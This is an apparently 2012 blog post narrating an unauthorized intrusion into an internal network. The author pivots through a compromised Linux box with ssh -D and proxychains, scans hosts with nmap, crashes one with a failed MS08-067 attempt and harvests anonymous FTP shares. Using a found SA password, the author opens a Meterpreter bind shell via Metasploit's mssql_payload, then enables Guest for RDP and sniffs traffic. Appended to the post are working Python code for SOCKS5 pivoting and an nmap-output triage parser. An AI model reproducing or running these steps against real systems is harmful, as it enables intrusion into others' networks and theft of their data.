377 The Proxy Road
Posted 2012-12-20 01:08:09
Continuing from 376 (a zombie box checked for rootkits). The core idea is the same as in 353 (Metasploit access across routers).


It has two NICs:


  [root@viewjpkc ~]# ifconfig | grep eth
  eth0      Link encap:Ethernet  HWaddr 00:21:5E:C8:F2:EC  
  eth1      Link encap:Ethernet  HWaddr 00:21:5E:C8:F2:EE  
  [root@viewjpkc ~]#
It's CentOS. As in 375 (Ettercap plus a rootkit for persistent ARP spoofing): I sniffed for a day, 200+ GB of packets, and ARP-poisoned nothing. The disks are beefy too:


  [root@viewjpkc ~]# fdisk -l

  Disk /dev/sda: 1048.5 GB, 1048576000000 bytes
  255 heads, 63 sectors/track, 127482 cylinders
  Units = cylinders of 16065 * 512 = 8225280 bytes

  Disk /dev/sda doesn't contain a valid partition table

  Disk /dev/sdb: 1048.5 GB, 1048576000000 bytes
  255 heads, 63 sectors/track, 127482 cylinders
  Units = cylinders of 16065 * 512 = 8225280 bytes

  Disk /dev/sdb doesn't contain a valid partition table

  Disk /dev/sdc: 1048.5 GB, 1048576000000 bytes
  255 heads, 63 sectors/track, 127482 cylinders
  Units = cylinders of 16065 * 512 = 8225280 bytes

  Disk /dev/sdc doesn't contain a valid partition table

  Disk /dev/sdd: 1048.5 GB, 1048576000000 bytes
  255 heads, 63 sectors/track, 127482 cylinders
  Units = cylinders of 16065 * 512 = 8225280 bytes

  Disk /dev/sdd doesn't contain a valid partition table

  Disk /dev/sde: 145.9 GB, 145999527936 bytes
  255 heads, 63 sectors/track, 17750 cylinders
  Units = cylinders of 16065 * 512 = 8225280 bytes

     Device Boot      Start         End      Blocks   Id  System
  /dev/sde1   *           1        1274    10233373+  83  Linux
  /dev/sde2            1275        7648    51199155   83  Linux
  /dev/sde3            7649       14022    51199155   83  Linux
  /dev/sde4           14023       17750    29945160    5  Extended
  /dev/sde5           14023       16061    16378236   82  Linux swap / Solaris

  Disk /dev/dm-0: 1048.5 GB, 1048576000000 bytes
  255 heads, 63 sectors/track, 127482 cylinders
  Units = cylinders of 16065 * 512 = 8225280 bytes

  Disk /dev/dm-0 doesn't contain a valid partition table
  [root@viewjpkc ~]# df -h
  Filesystem            Size  Used Avail Use% Mounted on
  /dev/sde3              48G   26G   19G  58% /
  /dev/sde2              48G  1.7G   44G   4% /var
  /dev/sde1             9.5G  160M  8.9G   2% /boot
  tmpfs                 5.9G     0  5.9G   0% /dev/shm
  /dev/dm-0             962G  4.2G  909G   1% /usr/local/Easiware/UploadFiles
  [root@viewjpkc ~]#


Install nmap first.


  [root@viewjpkc ~]# rpm -vhU http://nmap.org/dist/nmap-6.01-1.i386.rpm
  [root@viewjpkc ~]# rpm -vhU http://nmap.org/dist/zenmap-6.01-1.noarch.rpm
  [root@viewjpkc ~]# rpm -vhU http://nmap.org/dist/ncat-6.01-1.i386.rpm
  [root@viewjpkc ~]# rpm -vhU http://nmap.org/dist/nping-0.6.01-1.i386.rpm

  [root@viewjpkc ~]# nmap -v

  Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-28 11:16 CST
  Read data files from: /usr/bin/../share/nmap
  WARNING: No targets were specified, so 0 hosts scanned.
  Nmap done: 0 IP addresses (0 hosts up) scanned in 0.05 seconds
             Raw packets sent: 0 (0B) | Rcvd: 0 (0B)
  [root@viewjpkc ~]#


Scan the subnet behind one of the NICs first.


  [root@viewjpkc tmp]# nmap -sT -sV -p 445 256.256.0.0/24 --open >> 123456
  [root@viewjpkc tmp]# cat 123456


Found 256.256.0.11 alive, plus another host with the MS08-067 vulnerability, but I picked the wrong OS version and the 445 overflow crashed it.




  Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-28 11:18 CST
  Nmap scan report for 256.256.0.11
  Host is up (0.00011s latency).
  PORT    STATE SERVICE      VERSION
  445/tcp open  microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
  MAC Address: 00:1B:78:CF:B4:94 (Hewlett-Packard Company)
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows


Continue scanning.


  [root@viewjpkc tmp]# nmap -sT -A -O -sV -T5 256.256.0.17 -vv
  23/tcp   open  telnet?
  25/tcp   open  smtp?
  80/tcp   open  http          Microsoft IIS httpd 6.0
  110/tcp  open  pop3?
  119/tcp  open  nntp?
  135/tcp  open  msrpc         Microsoft Windows RPC
  139/tcp  open  netbios-ssn
  445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
  808/tcp  open  http-proxy    CCProxy http proxy (unauthorized)
  1028/tcp open  msrpc         Microsoft Windows RPC
  1029/tcp open  msrpc         Microsoft Windows RPC
  1031/tcp open  msrpc         Microsoft Windows RPC
  1032/tcp open  msrpc         Microsoft Windows RPC
  1080/tcp open  socks5        (Username/password authentication required)
  1433/tcp open  ms-sql-s      Microsoft SQL Server 2000 8.00.2039; SP4
  2121/tcp open  ccproxy-ftp?
  3389/tcp open  ms-wbt-server Microsoft Terminal Service
  5001/tcp open  ovm-manager   Oracle VM Manager
  7777/tcp open  ftp           Microsoft ftpd
  8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
  8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
  8888/tcp open  ftp           Microsoft ftpd
  9999/tcp open  ftp           Microsoft ftpd


Those are the services found, but from my own box they can't be reached:


  brk<~> $ nc -vv 256.256.0.17 445
  nc: connect to 256.256.0.17 port 445 (tcp) failed: No route to host


Set up a proxy first.


  brk<~> $ ssh -qTfnN -D 10086 root@58.45.191.83
  root@58.45.191.83's password:


Edit the proxy tool's config:
  brk<~> $ sudo nano /etc/proxychains.conf

and add the SOCKS line:

  socks5  127.0.0.1 10086


Test:


  brk<~> $ proxychains nc -vv 256.256.0.17 445
  ProxyChains-3.1 (http://proxychains.sf.net)
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.11:445-<><>-OK
  Connection to 256.256.0.11 445 port [tcp/microsoft-ds] succeeded!


Noticed it is running a whole lot of FTP servers????
8888/tcp open ftp Microsoft ftpd
9999/tcp open ftp Microsoft ftpd
7777/tcp open ftp Microsoft ftpd


  [root@viewjpkc tmp]# nmap -sV -sC -p 8888,9999,7777 256.256.0.17

  Starting Nmap 6.01 ( http://nmap.org ) at 2012-11-28 11:41 CST
  Nmap scan report for 256.256.0.17
  Host is up (0.00014s latency).
  PORT     STATE SERVICE VERSION
  7777/tcp open  ftp     Microsoft ftpd
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | 07-30-08  12:26AM                  106 _sfx_manifest_
  | 01-22-10  08:59PM              6914959 apache-tomcat-6.0.24.exe
  | 07-08-10  09:09PM       <DIR>          change
  | 07-17-10  03:45AM       <DIR>          data
  | 03-19-10  10:15PM            242743296 dotnetfx35.exe
  | 02-18-05  09:33AM                 9264 DVDgif01.jpg
  | 07-08-10  09:09PM       <DIR>          HPBBS
  | 01-11-11  03:47PM       <DIR>          ikudisk
  | 12-27-09  02:15AM             76236184 jdk-6u10-rc2-bin-b32-windows-i586-p-12_sep_2008.exe
  | 03-26-10  09:50PM             21161617 navicat8_lite_cs.exe
  | 07-09-10  10:08PM                 1346 RecoverySummary.rtf
  | 03-28-10  01:52AM       <DIR>          reg
  | 06-09-10  12:18AM       <DIR>          SQL_PERSONAL
  | 12-27-09  02:11AM            327057853 SQL_PERSONAL.rar
  | 06-09-10  12:18AM       <DIR>          SQL2000-KB884525-SP4-x86-CHS
  | 12-27-09  02:15AM             69796743 SQL2000-KB884525-SP4-x86-CHS.zip
  | 06-09-10  12:23AM       <DIR>          SQL2KSP4
  | 03-26-10  08:37PM       <DIR>          TCCN-3.1.3-Trinity4666
  | 03-19-10  10:19PM            185841508 TCCN-3.1.3-Trinity4666.exe
  | 11-28-12  04:56AM       <DIR>          TDDOWNLOAD
  |_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
  8888/tcp open  ftp     Microsoft ftpd
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | 07-20-10  03:21PM       <DIR>          Downloads
  | 07-09-10  09:14PM       <DIR>          home
  | 07-09-10  09:14PM       <DIR>          Intel
  | 12-10-10  09:52PM       <DIR>          LOSTFILE
  | 05-26-11  08:55PM       <DIR>          Program Files
  | 01-06-11  04:03PM       <DIR>          software
  | 07-08-10  09:17PM       <DIR>          ss
  | 07-09-10  09:29PM       <DIR>          tlbbs
  | 09-19-11  08:25PM       <DIR>          tlchat
  | 07-09-10  09:29PM       <DIR>          TLhome
  | 05-26-11  09:06PM       <DIR>          vss
  |_01-03-11  01:06AM       <DIR>          \xD0\xC2\xBD\xA8\xCE\xC4\xBC\xFE\xBC\xD0
  9999/tcp open  ftp     Microsoft ftpd
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | 07-24-10  02:31PM               370211 [NeHe.OpenGL.Tutorial][\xD6\xD0\xCE\xC4\xB0\xE6.CKER\xB7\xAD\xD2\xEB].chm
  | 07-25-10  06:13AM            216514560 [\xC8\xFD\xCE\xAC\xD3\xCE\xCF\xB7\xC9\xE8\xBC\xC6\xCA\xA6\xB1\xA6\xB5\xE4]\xD1\xA7OpenGL\xB1\xE03D\xD3\xCE\xCF\xB7.ISO
  | 07-19-10  04:38PM           2747414528 [\xCB\xE3\xB7\xA8\xC9\xE8\xBC\xC6\xD3\xEB\xB7\xD6\xCE\xF6-30\xBD\xB2]-\xD6\xD0\xBF\xC6\xD4\xBA.iso
  | 09-17-10  04:46PM               387721 3Dmax8.0\xD7\xA2\xB2\xE1\xBB\xFA.rar.RAR
  | 09-17-10  04:55PM             76187924 3DMAX8\xBC\xF2\xCC\xE5\xD6\xD0\xCE\xC4\xB0\xE6\xC3\xE2\xB0\xB2\xD7\xB0\xB0\xE6\xA1\xA23D MAX 9.0 \xBC\xB03D MAX 6.0 \xD5\xFD\xCA\xBD\xB0\xE6.RAR
  | 11-13-10  11:09PM                25945 815325_1289561070m0y2.rar
  | 07-19-10  01:49PM       <DIR>          cf
  | 06-25-10  01:15AM       <DIR>          cygwin
  | 06-25-10  09:55PM           1497624963 cygwin.rar
  | 07-17-10  03:45AM       <DIR>          data
  | 07-01-10  04:36PM             25077248 DG_2010V33_1112.exe
  | 07-01-10  04:39PM              5745328 drivethelife2010_setup.exe
  | 07-23-10  02:32PM              9573001 DTLite4356-0091.zip
  | 07-24-10  03:20PM            581591568 DXSDK_Feb10.exe
  | 07-08-10  11:38AM             18875776 easyrecovery_setup.exe
  | 05-02-10  05:02PM              9146584 FirefoxChinaEdition-latest.exe
  | 07-09-10  06:40AM       <DIR>          HPBBS
  | 07-01-10  08:00PM            690401280 ibm_util_sguide_8.13.49y0225_anyos_32-64.iso
  | 08-07-10  05:47PM              5214984 icbc_netbank_client_controls.exe
  | 04-01-10  01:35AM             43637663 kof2005_766_1220_setup.rar
  |_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
  MAC Address: 00:21:85:C1:45:B8 (Micro-star Int'l Co.)
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
  [root@viewjpkc tmp]#


Damn, every one of them allows anonymous login. Used a Firefox proxy plugin to browse them through the proxy.




Opened them up: lots of stuff.




After digging around for ages I found an SA password.




Hahaha

Launch MSF through the proxy; without the proxy it can't connect.


  brk</pen/msf3> $ sudo proxychains ./msfconsole

  msf > use exploit/windows/mssql/mssql_payload
  msf  exploit(mssql_payload) > set RHOST 256.256.0.17
  RHOST => 256.256.0.17
  msf  exploit(mssql_payload) > set PASSWORD pwd@123
  PASSWORD => pwd@123
  msf  exploit(mssql_payload) >

It's an internal network, so a bind shell is needed.


  msf  exploit(mssql_payload) > set PAYLOAD windows/meterpreter/bind_tcp
  PAYLOAD => windows/meterpreter/bind_tcp
  msf  exploit(mssql_payload) > set LPORT 45214
  LPORT => 45214
  msf  exploit(mssql_payload) > set METHOD old
  METHOD => old
  msf  exploit(mssql_payload) > exploit
  msf  exploit(mssql_payload) > exploit

  [*] Started bind handler
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:1433-|S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<><>-OK
  <--timeout
  [*] Warning: This module will leave yByNNKkq.exe in the SQL Server %TEMP% directory
  [*] Writing the debug.com loader to the disk...
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  [*] Converting the debug script to an executable...
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-[*] Uploading the payload, please be patient...
  <--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  [*] Converting the encoded payload...
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<--timeout
  [*] Executing the payload...
  |S-chain|-<>-127.0.0.1:10086-<><>-256.256.0.17:45214-<><>-OK
  [*] Sending stage (752128 bytes) to 256.256.0.17
  [*] Meterpreter session 1 opened (127.0.0.1:33451 -> 127.0.0.1:10086) at 2012-11-28 13:55:14 +0800

  meterpreter >

Got a shell. It has 3389 open, so add an account to it; I enabled Guest and logged in directly. Since this goes through the proxy, port forwarding can't be done.


  brk</pen/msf3> $ proxychains rdesktop 256.256.0.17 -r disk:MyDisk=/home/brk/ -g 1200*1000 -u guest -p 123456

Installed Cain and sniffed some HTTP stuff.



It's internal, so use the proxy: brk $ proxychains w3m 256.256.0.13/xxxx to log into the admin backend.

Login successful.


To be continued.



Play a thousand tunes and you will know music; examine a thousand swords and you will know weapons.
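The post routes nc, nmap and msfconsole through `ssh -D 10086` with proxychains, and picks a bind_tcp payload because a reverse payload would have nothing to call back to. What proxychains actually does on each connect is the SOCKS5 CONNECT handshake of RFC 1928. The following is an added example, not code from the original post: a minimal SOCKS5 client, plus an in-process stub SOCKS5 server (standing in for the ssh -D listener) and an echo server (standing in for the internal host) so the whole thing runs offline. The internal address 10.0.0.17:445 and everything else in `demo()` is constructed. The stub only honours CONNECT, like ssh -D, which is the reason the bind payload works and a reverse one would not.

```python
"""SOCKS5 CONNECT handshake (RFC 1928), i.e. what proxychains performs for
nc / nmap -sT / msfconsole when routed through `ssh -D`.  Added example,
not from the original post.  Runs offline with a stub proxy and an echo
'target'; all addresses and ports below are constructed."""
import socket
import struct
import threading

SOCKS_VERSION, NO_AUTH, CMD_CONNECT, ATYP_IPV4 = 0x05, 0x00, 0x01, 0x01
REP_SUCCESS, REP_REFUSED = 0x00, 0x05


def _recv_exact(sock, n):
    """Read exactly n bytes or raise; partial reads are normal on TCP."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def socks5_connect(proxy, target_ip, target_port, timeout=5):
    """Return a socket to target_ip:target_port tunnelled through the SOCKS5
    proxy (host, port), using NO AUTH and an IPv4 target: exactly what the
    `socks5 127.0.0.1 10086` line in proxychains.conf asks for."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(bytes([SOCKS_VERSION, 1, NO_AUTH]))            # greeting
    ver, method = _recv_exact(s, 2)
    if ver != SOCKS_VERSION or method != NO_AUTH:
        s.close()
        raise ConnectionError("proxy did not accept NO AUTH")
    s.sendall(bytes([SOCKS_VERSION, CMD_CONNECT, 0, ATYP_IPV4])
              + socket.inet_aton(target_ip) + struct.pack("!H", target_port))
    _ver, rep, _rsv, atyp = _recv_exact(s, 4)
    # Drain BND.ADDR/BND.PORT so the stream starts at the tunnelled payload.
    bnd_len = {ATYP_IPV4: 4, 0x04: 16}.get(atyp)
    if bnd_len is None:                                        # domain name
        bnd_len = _recv_exact(s, 1)[0]
    _recv_exact(s, bnd_len + 2)
    if rep != REP_SUCCESS:
        s.close()
        raise ConnectionError("CONNECT refused by proxy, REP=%#x" % rep)
    return s


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _serve(handler):
    """Listen on an ephemeral loopback port, one thread per connection."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def start_echo_server():
    """Stand-in for the internal host: sends back whatever it receives."""
    def echo(conn):
        with conn:
            _pump(conn, conn)
    return _serve(echo)


def start_stub_socks_server(routes):
    """Stand-in for ssh -D.  routes maps the (internal_ip, port) a client
    asks for to a (host, port) the 'pivot' can really reach.  Only CONNECT
    is honoured (no BIND), so a reverse payload could not come back here."""
    def handle(conn):
        with conn:
            _ver, nmethods = _recv_exact(conn, 2)
            _recv_exact(conn, nmethods)
            conn.sendall(bytes([SOCKS_VERSION, NO_AUTH]))
            _ver, cmd, _rsv, _atyp = _recv_exact(conn, 4)     # IPv4 only
            ip = socket.inet_ntoa(_recv_exact(conn, 4))
            (port,) = struct.unpack("!H", _recv_exact(conn, 2))
            dest = routes.get((ip, port))
            if cmd != CMD_CONNECT or dest is None:
                conn.sendall(bytes([SOCKS_VERSION, REP_REFUSED, 0, ATYP_IPV4]) + b"\0" * 6)
                return
            upstream = socket.create_connection(dest)
            conn.sendall(bytes([SOCKS_VERSION, REP_SUCCESS, 0, ATYP_IPV4]) + b"\0" * 6)
            threading.Thread(target=_pump, args=(upstream, conn), daemon=True).start()
            _pump(conn, upstream)
    return _serve(handle)


def demo():
    """Constructed scenario: 10.0.0.17:445 is reachable only via the pivot."""
    echo_port = start_echo_server()
    proxy = ("127.0.0.1", start_stub_socks_server({("10.0.0.17", 445): ("127.0.0.1", echo_port)}))
    s = socks5_connect(proxy, "10.0.0.17", 445)
    s.sendall(b"SMB?")
    reply = _recv_exact(s, 4)
    s.close()
    try:                       # a host the pivot cannot reach is refused at CONNECT
        socks5_connect(proxy, "10.0.0.99", 445).close()
        refused = False
    except ConnectionError:
        refused = True
    return reply, refused
```

`demo()` returns `(b"SMB?", True)`: the first connection is relayed and echoed, the second is refused with REP 0x05, which is the proxy-side equivalent of the "No route to host" nc printed before the tunnel existed. Pointing `proxy` at `("127.0.0.1", 10086)` and `target_ip` at a real internal host would make `socks5_connect` do the same thing proxychains did for nc and msfconsole in the post.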

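The post saves nmap's normal output with `>> 123456` and then reads it by eye to pick the host with 445 open, the SQL Server 2000 instance and the three anonymous FTP listeners. As an added example, not code from the original post, here is a small parser for that output format that extracts hosts, open ports and NSE script lines, with two triage queries over the result. The sample text is constructed, modelled on the listings in the post, with 10.0.0.x addresses substituted.

```python
"""Triage of saved nmap normal output (the `nmap ... >> 123456` file).
Added example, not from the original post; SAMPLE is constructed."""
import re

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")    # "| ftp-anon: ..." lines

SAMPLE = """\
Nmap scan report for 10.0.0.11
Host is up (0.00011s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds

Nmap scan report for 10.0.0.17
Host is up (0.00014s latency).
PORT     STATE SERVICE       VERSION
1433/tcp open  ms-sql-s      Microsoft SQL Server 2000 8.00.2039; SP4
3389/tcp open  ms-wbt-server Microsoft Terminal Service
7777/tcp open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 07-08-10  09:09PM       <DIR>          data
|_Only 20 shown. Use --script-args ftp-anon.maxlist=-1 to see all.
8888/tcp open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_07-09-10  09:14PM       <DIR>          home
"""


def parse_nmap_normal(text):
    """Return {ip: [port dicts]}; each port dict carries the NSE script
    results (first line of each script) reported directly under it."""
    hosts, ports, port = {}, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            ports = hosts.setdefault(m.group(1), [])
            port = None
            continue
        m = PORT_RE.match(line)
        if m and ports is not None:
            num, proto, state, service, version = m.groups()
            port = {"port": int(num), "proto": proto, "state": state,
                    "service": service, "version": version, "scripts": {}}
            ports.append(port)
            continue
        m = SCRIPT_RE.match(line)
        if m and port is not None:
            port["scripts"][m.group(1)] = m.group(2)
    return hosts


def anonymous_ftp(hosts):
    """(ip, port) pairs where the ftp-anon script reported anonymous login."""
    return sorted((ip, p["port"]) for ip, ports in hosts.items() for p in ports
                  if p["scripts"].get("ftp-anon", "").startswith("Anonymous FTP login allowed"))


def find_service(hosts, needle):
    """(ip, port, version) for open ports whose version banner contains needle."""
    return [(ip, p["port"], p["version"]) for ip, ports in hosts.items()
            for p in ports if p["state"] == "open" and needle in p["version"]]
```

Run over the sample, `anonymous_ftp` yields the two anonymous FTP ports on 10.0.0.17 and `find_service(hosts, "SQL Server 2000")` the 1433 banner that led to the mssql_payload step; on the real saved file the same two calls replace the manual `cat 123456`. Use `-oX` and a proper XML parser for anything larger than a one-off, since nmap's normal output is not a stable format.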